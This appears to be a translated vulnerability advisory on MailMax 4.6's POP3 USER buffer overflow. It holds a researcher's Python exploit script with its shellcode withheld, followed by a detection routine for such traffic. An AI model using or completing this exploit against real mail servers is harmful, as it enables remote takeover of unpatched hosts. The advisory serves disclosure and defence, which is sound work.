Release date:
Updated on: 2012-04-17
Affected Systems:
SmartMax Software MailMax 4.6
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52838
MailMax is an extensible email server that supports the SMTP, IMAP4 and POP3 protocols. Its TCP/IP GUI lets server administrators connect to and manage the server remotely over the Internet.
MailMax 4.6 contains a buffer overflow in its POP3 service: an overlong argument to the USER command, sent before any login, overwrites control data on the stack. A remote attacker can exploit this to execute arbitrary code with the privileges of the mail server.
Source: localh0t
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
localh0t () provides the following test method:
#!/usr/bin/python
# MailMax <= v4.6 POP3 "USER" Remote Buffer Overflow Exploit (No Login Needed)
# Newer versions not tested, maybe vulnerable too
# A hard one this, the shellcode MUST be lowercase. Plus there are still opcodes that break
# the payload and opcodes that get changed, like "\xc3" gets converted to "\xe3", and "\xd3" gets converted to "\xf3"
# Written by localh0t
# Date: 29/03/12
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
# Tested on: Windows XP SP3 Spanish (No DEP)
# Targets: Windows (All) (DEP Disabled)
# Shellcode: Bindshell on port 4444 (Change as you wish) (Lowercase Only, use EBX as baseaddr)
# (Python 2 script, as originally published)

from socket import *
import sys, struct, os, time

if (len(sys.argv) < 3):
    print "\nMailMax <= v4.6 POP3 \"USER\" Remote Buffer Overflow Exploit (No Login Needed)"
    print "\n Usage: %s" % (sys.argv[0])   # argument placeholders were lost in extraction; host and port are expected
    sys.exit()

print "\n[!] Connecting to %s..." % (sys.argv[1])
# Connect to host
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((sys.argv[1], int(sys.argv[2])))
sock.recv(1024)           # read the POP3 banner
time.sleep(5)

buffer = "USER"
buffer += "A" * 1439                 # padding
buffer += "\xEB\x06\x90\x90"         # Short jmp (6 bytes)
buffer += "\x86\xb3\x02\x10"         # pop | ret 1c, dbmax2.dll
buffer += "\x90" * 8                 # nops (just to be sure)
# Popad's, so esp => shellcode
buffer += "\x61" * 145
# Nop's to align
buffer += "\x90" * 11
# And ebx, esp
buffer += "\x21\xe3"
# Or ebx, esp
buffer += "\x09\xe3"
# At this point, ebx = esp. The shellcode is lowercase (with numbers), baseaddr = EBX
buffer += ("bytes")                  # the shellcode itself is not reproduced in this listing
buffer += "\x90" * 2000
buffer += "\r\n"

print "[!] Sending exploit..."
sock.send(buffer)
sock.close()
print "[!] Exploit succeed. Now netcat %s on port 4444\n" % (sys.argv[1])
sys.exit()
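From the defender's side, the exploit above is easy to recognise on the wire: a single POP3 USER command whose argument is over a kilobyte, made of long runs of one byte value (the "A" padding and the 0x90 NOP sleds) and of non-printable bytes. The following detection routine is an added example, not part of the original advisory or of localh0t's script; the length threshold, the run length that counts as a sled, and the two sample client sessions are constructed assumptions.

```python
#!/usr/bin/env python3
# Added example (not from the advisory): flag POP3 "USER" commands shaped like
# the MailMax 4.6 overflow (huge argument, repeated-byte padding, raw bytes).
import re

MAX_USER_LEN = 256   # assumed sane bound for a mailbox name (RFC 5321 local-part max is 64)
SLED_RUN = 32        # assumed: >= 32 identical consecutive bytes looks like padding / NOP sled

USER_RE = re.compile(rb"^USER[ \t]+(.*)$", re.IGNORECASE | re.DOTALL)


def check_pop3_command(line: bytes) -> dict:
    """Inspect one client->server POP3 command line (CRLF already stripped)."""
    reasons = []
    m = USER_RE.match(line)
    if not m:
        return {"alert": False, "reasons": reasons}
    arg = m.group(1)
    if len(arg) > MAX_USER_LEN:
        reasons.append("user_arg_len=%d" % len(arg))
    # a long run of a single byte value: "A" * 1439 padding or "\x90" sleds
    if re.search(rb"(.)\1{%d,}" % (SLED_RUN - 1), arg, re.DOTALL):
        reasons.append("repeated_byte_run")
    # control characters and high bytes have no place in a mailbox name
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("non_printable_bytes")
    return {"alert": bool(reasons), "reasons": reasons}


def scan_session(stream: bytes) -> list:
    """Split a captured client stream on CRLF; return (line_index, reasons) per alert."""
    alerts = []
    for i, line in enumerate(stream.split(b"\r\n")):
        verdict = check_pop3_command(line)
        if verdict["alert"]:
            alerts.append((i, verdict["reasons"]))
    return alerts


# Constructed sample traffic: a normal login, and a USER line shaped like the exploit.
BENIGN = b"USER alice\r\nPASS s3cret\r\nSTAT\r\n"
SUSPECT = b"USER " + b"A" * 1439 + b"\x90" * 64 + b"\r\n"

if __name__ == "__main__":
    print(scan_session(BENIGN))   # []
    print(scan_session(SUSPECT))  # [(0, ['user_arg_len=1503', 'repeated_byte_run', 'non_printable_bytes'])]
```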
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
SmartMax Software
-----------------
At the time of writing the vendor has not released a patch or an upgraded version. Users of the software should watch the vendor's homepage for an updated release:
http://www.smartmax.com